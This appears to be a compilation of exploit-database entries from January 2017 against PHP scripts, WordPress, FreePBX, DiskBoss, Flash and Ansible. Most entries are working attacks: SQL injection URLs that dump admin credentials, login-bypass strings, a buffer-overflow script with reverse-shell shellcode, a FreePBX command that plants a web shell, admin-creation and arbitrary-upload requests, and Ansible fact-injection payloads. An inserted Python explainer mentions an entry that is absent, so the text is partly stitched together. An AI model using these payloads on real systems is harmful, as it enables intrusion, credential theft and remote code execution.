# http://localhost/[PATH]/view_image.php?path=[SQL]
# # # # # 


--------------------------------------------------
Note:

Rate: 0/10 [Rate Picture] <<<Link
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124 union select 1,version(),3,4,5,6,7,8,9
Version: javascript:%20ajax_rate_pic(5.5.52-cll,1,1)
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(admin_id,admin_uname,admin_pass,admin_email),3,4,5,6,7,8,9+from+admin_master--

--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_schema=database()--

--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--
            
# # # # # 
# Vulnerability:: Admin Login Bypass & SQLi
# Date:09.01.2017
# Vendor Homepage: http://software.friendsinwar.com/
# Script Name: My Link Trader
# Script Version: v1.1
# Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=13
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# http://localhost/[PATH]/admin/login.php and set Username and Password to 'or''=' and hit enter.
# # # # # 
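Why `' or ''='` opens the admin area in both the My Click Counter and the My Link Trader entries above, beside a parameterized login that it does not open; an added Python/sqlite3 example, not the vendor's PHP, with the table and column names assumed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory schema; the vendor's real table and columns are assumed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin (username, password) VALUES (?, ?)",
                 ("admin", "constructed-secret"))  # plaintext only to keep the model short
    return conn


def build_query_vulnerable(username: str, password: str) -> str:
    """String-built WHERE clause of the kind the bypass relies on (assumed shape).
    With the payload in both fields it becomes
        username='' or ''='' AND password='' or ''=''
    which SQL parses as  username='' OR (''='' AND password='') OR ''=''  and the
    final ''='' is always true, so every row matches."""
    return ("SELECT id FROM admin WHERE username='" + username
            + "' AND password='" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    return conn.execute(build_query_vulnerable(username, password)).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the quotes in the input are data, never SQL."""
    row = conn.execute("SELECT id FROM admin WHERE username=? AND password=?",
                       (username, password)).fetchone()
    return row is not None


BYPASS = "' or ''='"  # the payload quoted in both advisories


if __name__ == "__main__":
    print(build_query_vulnerable(BYPASS, BYPASS))
    print("vulnerable login with payload:", login_vulnerable(make_db(), BYPASS, BYPASS))
    print("parameterized login with payload:", login_parameterized(make_db(), BYPASS, BYPASS))
```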
            
# Vulnerability: My Php Dating 2.0 - SQL Injection 

# Google Dork: use your mind

# Date: 09.01.2017

# Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm

# Tested on: win7

# Author: Nassim Asrir

# Author Company: Henceforth

# Contact: wassline@gmail.com 
#########################


# SQL Injection/Exploit :

# Vulnerable Parameter : id

# http://localhost/[PATH]/view_profile.php?id=[SQL]
            
# Exploit 	: Make or Break 1.7 (imgid) SQL Injection Vulnerability
# Author	: v3n0m
# Contact	: v3n0m[at]outlook[dot]com
# Date		: January, 09-2017 GMT +7:00 Jakarta, Indonesia
# Software	: Make or Break
# Version	: 1.7 Lower versions may also be affected
# License	: Free
# Download	: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
# Credits	: YOGYACARDERLINK, Dhea Fathin Karima & YOU !!

1. Description

An attacker can exploit this vulnerability to read from the database.
The parameter 'imgid' is vulnerable.


2. Proof of Concept

http://domain.tld/[path]/index.php?imgid=-9999+union+all+select+null,null,null,null,version(),null--

# Exploitation via SQLMap

Parameter: imgid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: imgid=1 AND 4688=4688
    Vector: AND [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: imgid=1 OR SLEEP(2)
    Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: imgid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176786271,0x746264586d76465246657a5778446f756c6d696859494e7247735476506447726470676f4e544c59,0x71706b7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WQyQ
    Vector:  UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]


3. Security Risk

The security risk of the remote sql-injection web vulnerability in the Make or Break CMS is estimated as high.
            
#!/usr/bin/python
 
# Exploit Title: DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow
# Date: 10-01-2017
# Exploit Author: Wyndell Bibera
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.5.12.exe
# Version: 7.5.12
# Tested on: Windows XP Professional SP3

import socket

ip = "192.168.86.150"
port = 80
 
egg = "ezggezgg"
nopslide = "\x90" * 8

# Bad characters: \x00\x09\x0a\x0d\x20
# Reverse Shell @ Port 443 - Change shellcode section accordingly
shellcode = ("\xb8\x45\x49\xe1\x98\xda\xc5\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x52\x31\x47\x12\x03\x47\x12\x83\x82\x4d\x03\x6d\xf0\xa6\x41"
"\x8e\x08\x37\x26\x06\xed\x06\x66\x7c\x66\x38\x56\xf6\x2a\xb5"
"\x1d\x5a\xde\x4e\x53\x73\xd1\xe7\xde\xa5\xdc\xf8\x73\x95\x7f"
"\x7b\x8e\xca\x5f\x42\x41\x1f\x9e\x83\xbc\xd2\xf2\x5c\xca\x41"
"\xe2\xe9\x86\x59\x89\xa2\x07\xda\x6e\x72\x29\xcb\x21\x08\x70"
"\xcb\xc0\xdd\x08\x42\xda\x02\x34\x1c\x51\xf0\xc2\x9f\xb3\xc8"
"\x2b\x33\xfa\xe4\xd9\x4d\x3b\xc2\x01\x38\x35\x30\xbf\x3b\x82"
"\x4a\x1b\xc9\x10\xec\xe8\x69\xfc\x0c\x3c\xef\x77\x02\x89\x7b"
"\xdf\x07\x0c\xaf\x54\x33\x85\x4e\xba\xb5\xdd\x74\x1e\x9d\x86"
"\x15\x07\x7b\x68\x29\x57\x24\xd5\x8f\x1c\xc9\x02\xa2\x7f\x86"
"\xe7\x8f\x7f\x56\x60\x87\x0c\x64\x2f\x33\x9a\xc4\xb8\x9d\x5d"
"\x2a\x93\x5a\xf1\xd5\x1c\x9b\xd8\x11\x48\xcb\x72\xb3\xf1\x80"
"\x82\x3c\x24\x06\xd2\x92\x97\xe7\x82\x52\x48\x80\xc8\x5c\xb7"
"\xb0\xf3\xb6\xd0\x5b\x0e\x51\x1f\x33\x46\x2d\xf7\x46\x66\x2c"
"\xb3\xce\x80\x44\xd3\x86\x1b\xf1\x4a\x83\xd7\x60\x92\x19\x92"
"\xa3\x18\xae\x63\x6d\xe9\xdb\x77\x1a\x19\x96\x25\x8d\x26\x0c"
"\x41\x51\xb4\xcb\x91\x1c\xa5\x43\xc6\x49\x1b\x9a\x82\x67\x02"
"\x34\xb0\x75\xd2\x7f\x70\xa2\x27\x81\x79\x27\x13\xa5\x69\xf1"
"\x9c\xe1\xdd\xad\xca\xbf\x8b\x0b\xa5\x71\x65\xc2\x1a\xd8\xe1"
"\x93\x50\xdb\x77\x9c\xbc\xad\x97\x2d\x69\xe8\xa8\x82\xfd\xfc"
"\xd1\xfe\x9d\x03\x08\xbb\xae\x49\x10\xea\x26\x14\xc1\xae\x2a"
"\xa7\x3c\xec\x52\x24\xb4\x8d\xa0\x34\xbd\x88\xed\xf2\x2e\xe1"
"\x7e\x97\x50\x56\x7e\xb2")
scpad = "\x90" * (2480 - len(shellcode) - len(nopslide))
shortjmp = "\xeb\x0f\x90\x90"

# Search for string 'ezgg' twice
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x65\x7a\x67\x67\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

extra = "\x90" * 9
pad = "\x90" * (5000 - len(extra) - 2496 - len(egghunter))

# POP POP RET Instruction
seh = "\x6b\xa6\x02\x10" 

buffer = (
"POST " + egg + nopslide + shellcode + scpad + shortjmp + seh + extra + egghunter + pad + " HTTP/1.1\r\n"
"Host: :192.168.86.150\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*    ;q=0.8\r\n\r\n")
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(buffer)
s.close()
            
# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation
# Date: 10-01-2017
# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: web
 
1. Description

You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().

http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html

2. Proof of Concept

<form method="post" action="http://wp/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="administrator">
	<input type="hidden" name="email" value="sth">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

Then you can go to admin panel.
            
Exploit Title: Freepbx cookie recordings injection
Google Dork: Ask Santa
Date: 23/12/2016
Exploit Author: inj3ctor3
Vendor Homepage: https://www.freepbx.org/
Software Link: ISO LINKS IN SITE https://www.freepbx.org/
Version: ALL && unpatched/ (Trixbox/freepbx/elastix/pbxinflash/)
Tested on: Centos 6
CVE : CVE-2014-7235

1. Description

A critical zero-day remote code execution and privilege escalation
exploit within the legacy "FreePBX ARI Framework module/Asterisk
Recording Interface (ARI)".
htdocs_ari/includes/login.php in the ARI Framework module/Asterisk Recording Interface (ARI) in FreePBX before 2.9.0.9, 2.10.x,
and 2.11 before 2.11.1.5 allows remote attackers to execute arbitrary code via the ari_auth cookie,
related to the PHP unserialize function.

<?php
.....
...
line 56 $buf = unserialize(stripslashes($_COOKIE['ari_auth']));
 line 57 list($data,$chksum) = $buf;
....
?>

A successful attack may compromise the whole system, aiding the attacker in gaining
further privileges by taking advantage of the well-known nmap shell.

Without further ado, this is the PoC code:

curl -ks -m20 http://127.0.0.1/recordings/index.php" --cookie "ari_lang=() { :;};php -r 'set_time_limit(0);unlink("page.framework.php");file_put_contents("misc/audio.php", "<?php if(\$_COOKIE[\"lang\"]) {system(\$_COOKIE[\"lang\"]);}die();?>");';ari_auth=O:8:"DB_mysql":6:{s:19:"_default_error_mode";i:16;s:22:"_default_error_options";s:9:"do_reload";s:12:"_error_class";s:4:"TEST";s:13:"was_connected";b:1;s:7:"options";s:3:"123";s:3:"dsn";a:4:{s:8:"hostspec";s:9:"localhost";s:8:"username";s:4:"root";s:8:"password";s:0:"";s:8:"database";s:7:"trigger";}};elastixSession=716ratk092555gl0b3gtvt8fo7;UICSESSION=rporp4c88hg63sipssop3kdmn2;ARI=b8e4h6vfg0jouquhkcblsouhk0" --data "username=admin&password=admin&submit=btnSubmit" >/dev/null

if curl -ks -m10 "http://127.0.0.1/recordings/misc/audio.php" --cookie "lang=id" | grep asterisk >/dev/null;then echo "127.0.0.1/recordings/misc/audio.php" | tee -a xploited_new.txt;fi
 
            
# Vulnerability: Starting Page- SQL Injection

# Date: 10.01.2017

# Vendor Homepage: http://software.friendsinwar.com/

# Tested on: win10

# Author: JaMbA

# Script link: http://software.friendsinwar.com/news.php?readmore=31

#########################


# SQL Injection/Exploit :

# Vulnerable Parameter : linkid

# http://localhost/[PATH]/outgoing.php?linkid=[SQL]

Tunisia 4 ever
            
# # # # # 
# Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...)
# Google Dork: FMyLife Clone Script
# Date:10.01.2017
# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm
# Script Name: FMyLife Clone Script (Pro Edition)
# Script Version: 1.1
# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/   
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
#Exploit :
<html>
<body>
<h2>Add an Administrator</h2>
<form action="http://localhost/[PATH]/admin/" method="post">
 <div id="add-admin-form">
  <input type="hidden" name="action" value="add-admin" />
  <label for="username">Username:</label>
  <input type="text" id="username" name="admin-username" value="" />
  <div class="spacer"></div>
  <label for="password">Password:</label>
  <input type="password" id="password" name="admin-password" value="" />
  <div class="spacer"></div>
  <input type="image" src="add-administrator.png" name="add-admin" id="add-admin" value="Add Administrator" />
 </div>
</form>
</body>
</html>
# # # # # 
            
Source: https://cosig.gouv.qc.ca/en/cosig-2017-01-en/

#####################################################################################

# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 24.0.0.186 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: January 10, 2017
# CVE-2017-2930
# COSIG-2016-35

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

================
1) Introduction
================

Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is freeware for using content created
on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio.
Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. Flash Player was created by Macromedia
and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.

(https://en.wikipedia.org/wiki/Adobe_Flash_Player)

#####################################################################################

============================
2) Coordination Report
============================

2016-11-13: Francis Provencher of COSIG reported this vulnerability to Adobe PSIRT;
2016-11-14: Adobe PSIRT confirmed this vulnerability;
2017-01-10: Adobe published a patch (APSB17-02);
2017-01-10: Advisory released by COSIG;

#####################################################################################

=====================
3) Technical details
=====================

The vulnerability allows a remote attacker to execute malicious code or access part of the dynamically allocated memory. With user interaction
(visiting a web page or opening a specially crafted SWF file), an attacker is able to trigger an "out of bounds" memory corruption. A file with an "ActionRecord"
structure that contains an invalid value in "ActionGetURL2" could lead to remote code execution in the context of the current user.

#####################################################################################

===========
4) POC:
===========

https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41008.zip

####################################################################################
            
# Exploit Title: Starting Page 1.3 "Add a Link" - SQL Injection
# Date: 11-01-2017
# Software Link: http://software.friendsinwar.com/downloads.php?cat_id=2&download_id=11
# Exploit Author: Ben Lee
# Contact: benlee9@outlook.com
# Category: webapps

# Tested on: Win7


1. Description


The vulnerable file is "link_req_2.php": none of the POST parameters are filtered before they are used in the SQL query.


2. Vulnerable parameters:


'$_POST[category]','$_POST[name]','$_POST[url]','$_POST[description]','$_POST[email]'


3.Proof of Concept:


Url:http://www.example.com/StartingPage/link_req_2.php


Post data:


[category=1' AND (select 1 from(select count(*),concat((select(select(select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e)from sp_admin limit 0,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND 'a'='a&name=abc&email=admin@admin.com&url=www.xxx.com&description=helloworld]




Best Regards!
Ben Lee
            
# Vulnerability: My link trader - SQL Injection
# Date: 11.01.2017
# Vendor Homepage: http://software.friendsinwar.com/scripts_example/my_link_trader/
# Tested on: Kali Linux 2016.2
# Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawid.morawski1990@gmail.com
#########################

#########################
# SQL Injection/POC :
# Vulnerable Parameter : id
# http://localhost/[PATH]/out.php?id=[SQL]
            
# Exploit Title: b2evolution6.8.2stable – Upload
# Date: 29/12/2016
# Exploit Author: Li Fei
# Vendor Homepage: http://b2evolution.net/
# Software Link: http://b2evolution.net/downloads/6-8-2-stable?download=6407
# Version: 6.8.2
# Tested on: win7 64bit

No admin access is needed to upload files, and any file type (.php, .exe, ...) can be uploaded without any bypass.

1- go to http://localhost/b2evolution/index.php/a/extended-post

2- click on the Browse button and select your file

3- click on upload

The uploaded ceshi.php is then reachable at:

http://SiteName/ceshi.php

PoC URL:

POST /b2evolution/htsrv/comment_post.php HTTP/1.1

PoC headers:

Host: localhost
Content-Length: 1054
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZ4hUYCjABZB7YSL
Referer: http://localhost/b2evolution/index.php/a/extended-post
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: session_b2evo=8323_COaAvLi6oU0LKIlMsoa207tOu4MRliDS; iCMS_USER_AUTH=93f92757UuFn7JIQa3nI%252Bk%252FF0s5elmm8KsIgZm%252F357CeOEhJUy7AsnKbPiZUa2eJTzmQx9lPUSaQcNVQtRiWJd%252BCBX0BQ4UpjoiTRBtkGujEc8rTtKoz3IGSFexrQEnmFfxKiL%252B1KR4nGq9wA88zDfJw6c1D7w7xeiYht2Iwo72Fcv8s6JjLcedy52QCOTHRPAFQ%252BdKcClUZz4vjvIvfZi5j6V4xQ1jpbnvV%252FMH6uyw7%252BL4Q41xqDKfgf1j7Sl36%252FGiXHwnij92A6nAMnxG78ZkUg5WG9PY5AtTyEMEtrHAuip7iPJbItdeuTSiTqwoIff%252BLuU4FM9nEldOYY2Jm9UD6XdgaXuyZBHhvb1v0buICmdQPX6rfrki9lZA; iCMS_userid=faf9c76a%252FQiEcyDoXBxmLMRDumokuULwqflVA%252FnfKJbcmsqFgw; iCMS_nickname=a693e7b1f4QEBL83uf0qmVI9BhIOCYq%252FTxa7NPwX8xobJpNm8bA; a8850_times=1; CNZZDATA80862620=cnzz_eid%3D1580835190-1482064117-http%253A%252F%252Flocalhost%252F%26ntime%3D1482064117; iweb_captcha=a95d2426cce76ef614NzA5ODI0NDUwOT5uZjFmY2RibDw4NGMyZjYxYzdmY2Bsa2ppdA; iweb_admin_role_name=6f99d0f079b6898180NDA1OTgwODg2NTk2PWA0Y2IwNGY9YWJgYWI3PmpgO2TrtofivafjrqbnmIXtkZg; iweb_admin_id=bef908b03b94700ce0ODA1MDEwMDAwMGowOTZlNzUwMTg2MDMxMmA3MWIxMzYx; iweb_admin_name=bef908b03b94700ce0ODA1MDEwMDAwMD8xbmUzMWFlOThiOzI3YjVmOjFgMjlhbWxpZg; iweb_admin_pwd=52f2f828c001b132f5NzAwMDc1NDcwMTg9YTE3NW8xYzA0M2E1YDdlYmY9YTllMjBnYmAyOjI5amEyOWNkYGU3NmUwNTdmNDVjPTA1ZQ

Connection: close

------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="comment_rating"


------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="g"


------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="uploadfile[]"; filename="ceshi.php"
Content-Type: application/octet-stream

<?php
eval("echo'hello world';");
?>
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="submit_comment_post_19[save]"

Send comment
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="crumb_comment"

dXuthsKjMjhG2dnhADtzzOW414qV6Qky
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="comment_type"

comment
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="comment_item_ID"

19
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="redirect_to"

http://localhost/b2evolution/index.php/a/extended-post
------WebKitFormBoundarytZ4hUYCjABZB7YSL--
            
Source: https://cosig.gouv.qc.ca/en/cosig-2017-01-en/

#####################################################################################

# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 24.0.0.186 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: January 10, 2017
# CVE-2017-2930
# COSIG-2016-35

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

================
1) Introduction
================

Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is freeware for using content created
on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio.
Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. Flash Player was created by Macromedia
and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.

(https://en.wikipedia.org/wiki/Adobe_Flash_Player)

#####################################################################################

============================
2) Coordination Report
============================

2016-11-13: Francis Provencher of COSIG reported this vulnerability to Adobe PSIRT;
2016-11-14: Adobe PSIRT confirmed this vulnerability;
2017-01-10: Adobe published a patch (APSB17-02);
2017-01-10: Advisory released by COSIG;

#####################################################################################

=====================
3) Technical details
=====================

The vulnerability allows a remote attacker to execute malicious code or access part of the dynamically allocated memory. With user interaction
(visiting a web page or opening a specially crafted SWF file), an attacker is able to trigger an "out of bounds" memory corruption. A file with an "ActionRecord"
structure that contains an invalid value in "ActionGetURL2" could lead to remote code execution in the context of the current user.

#####################################################################################

===========
4) POC:
===========

https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41012.zip

####################################################################################
            
###########  Computest security advisory CT-2017-0109 #############

            Summary: Command execution on Ansible controller from host
  Affected software: Ansible
	        CVE: CVE-2016-9587
      Reference URL: https://www.computest.nl/advisories/
                     CT-2017-0109_Ansible.txt
  Affected versions: < 2.1.4, < 2.2.1

             Credit: Undisclosed at Computest (research@computest.nl)
Date of publication: January 9, 2017

During a summary code review of Ansible, Computest found and exploited several
issues that allow a compromised host to execute commands on the Ansible
controller and thus gain access to the other hosts controlled by that
controller. 

This was not a full audit and further issues may or may not be present.

About Ansible
-------------
"Ansible is an open-source automation engine that automates cloud provisioning,
configuration management, and application deployment. Once installed on a
control node, Ansible, which is an agentless architecture, connects to a managed
node through the default OpenSSH connection type."
							- wikipedia.org
													
Technical Background
--------------------
A big threat to a configuration management system like Ansible, Puppet, Salt
Stack and others, is compromise of the central node. In Ansible terms this is
called the Controller. If the Controller is compromised, an attacker has
unfettered access to all hosts that are controlled by the Controller. As such,
in any deployment, the central node receives extra attention in terms of
security measures and isolation, and threats to this node are taken even more
seriously.

Fortunately for team blue, in the case of Ansible the attack surface of the
Controller is pretty small. Since Ansible is agent-less and based on push, the
Controller does not expose any services to hosts. 

A very interesting bit of attack surface though is in the Facts. When Ansible
runs on a host, a JSON object with Facts is returned to the Controller. The
Controller uses these facts for various housekeeping purposes. Some facts have
special meaning, like the fact "ansible_python_interpreter" and
"ansible_connection". The former defines the command to be run when Ansible is
looking for the python interpreter, and the second determines the host Ansible
is running against. If an attacker is able to control the first fact he can
execute an arbitrary command, and if he is able to control the second fact he is
able to execute on an arbitrary (Ansible-controlled) host. This can be set to
"local" to execute on the Controller itself.

Because of this scenario, Ansible filters out certain facts when reading the
facts that a host returns. However, we have found 6 ways to bypass this filter.

In the scenarios below, we will use the following variables:

PAYLOAD = "touch /tmp/foobarbaz"

# Define some ways to execute our payload.
LOOKUP = "lookup('pipe', '%s')" % PAYLOAD
INTERPRETER_FACTS = {
	# Note that it echoes an empty dictionary {} (it's not a format string).
	'ansible_python_interpreter': '%s; cat > /dev/null; echo {}' % PAYLOAD,
	'ansible_connection': 'local',
	# Become is usually enabled on the remote host, but on the Ansible
	# controller it's likely password protected. Disable it to prevent
	# password prompts.
	'ansible_become': False,
}
 
Bypass #1: Adding a host
------------------------
Ansible allows modules to add hosts or update the inventory. This can be very
useful, for instance when the inventory needs to be retrieved from an IaaS
platform, as the AWS module does.

If we're lucky, we can guess the inventory_hostname, in which case the host_vars
are overwritten [2] and they will be in effect at the next task. If host_name
doesn't match inventory_hostname, it might get executed in the play for the next
hostgroup, also depending on the limits set on the commandline.

# (Note that when data["add_host"] is set,
# data["ansible_facts"] is ignored.)
data['add_host'] = {
    # assume that host_name is the same as inventory_hostname
    'host_name': socket.gethostname(),
    'host_vars': INTERPRETER_FACTS,
}

# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/strategy/__init__.py#L447
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/strategy/__init__.py#L580
		
Bypass #2: Conditionals
-----------------------
Ansible actions allow for conditionals. If we know the exact contents of a
"when" clause, and we register it as a fact, a special case checks whether the
"when" clause matches a variable [1]. In that case it replaces it with its
contents and evaluates [2] them.

# Known conditionals, separated by newlines
known_conditionals_str = """
ansible_os_family == 'Debian'
ansible_os_family == "Debian"
ansible_os_family == 'RedHat'
ansible_os_family == "RedHat"
ansible_distribution == "CentOS"
result|failed
item > 5
foo is defined
"""
known_conditionals = [x.strip() for x in known_conditionals_str.split('\n')]
for known_conditional in known_conditionals:
    data['ansible_facts'][known_conditional] = LOOKUP
	
[1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/playbook/conditional.py#L118
[2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/playbook/conditional.py#L125
		
Bypass #3: Template injection in stat module
--------------------------------------------
The template module/action merges its results with those of the stat module.
This allows us to bypass [1][2][3] the stripping of magic variables from
ansible_facts [4], because they're at an unexpected location in the result tree.

data.update({
    'stat': {
        'exists': True,
        'isdir': False,
        'checksum': {
            'rc': 0,
            'ansible_facts': INTERPRETER_FACTS,
        },
    }
})

# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L39
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L49
# [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L146
# [4] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/__init__.py#L678

Bypass #4: Template injection by changing jinja syntax
------------------------------------------------------
Remote facts always get quoted. Set_fact unquotes them by evaluating them.
UnsafeProxy was designed to defend against unquoting by transforming jinja
syntax into jinja comments, effectively disabling injection.

Bypass the filtering of "{{" and "{%" by changing the jinja syntax [1][2]. The
{{}} is needed to make it look like a variable [3].  This works against:
- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}

data['ansible_facts'].update({
    'exploit_set_fact': True,
    'ansible_os_family': "#jinja2:variable_start_string:'[[',variable_end_string:']]',block_start_string:'[%',block_end_string:'%]'\n{{}}\n[[ansible_host]][[lookup('pipe', '" + PAYLOAD  + "')]]",
})

# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L66
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L469
# [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L308


Bypass #5: Template injection in dict keys
------------------------------------------
Strings and lists are properly cleaned up, but dictionary keys are not [1]. This
works against:
- set_fact: foo="some prefix {{ansible_os_family}} and/or suffix"
- command: echo "{{foo}}

The prefix and/or suffix are needed in order to turn the
dict into a string, otherwise the value would remain a dict.

data['ansible_facts'].update({
    'exploit_set_fact': True,
    'ansible_os_family': { "{{ %s }}" % LOOKUP: ''},
})

# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/vars/unsafe_proxy.py#L104
		

Bypass #6: Template injection using safe_eval
---------------------------------------------
There's a special case for evaluating strings that look like a list or dict [1].
Strings that begin with "{" or "[" are evaluated by safe_eval [2]. This allows
us to bypass the removal of jinja syntax [3]: we use the whitelisted Python to
re-create a bit of Jinja template that is interpreted.

This works against:
- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}

data['ansible_facts'].update({
    'exploit_set_fact': True,
    'ansible_os_family': """[ '{'*2 + "%s" + '}'*2 ]""" % LOOKUP,
})

# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L334
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/safe_eval.py
# [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L229

Issue: Disabling verbosity
--------------------------
Verbosity can be set on the controller to get more debugging information. This
verbosity is controlled through a custom fact. A host however can overwrite this
fact and set the verbosity level to 0, hiding exploitation attempts.

data['_ansible_verbose_override'] = 0

# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/callback/default.py#L99
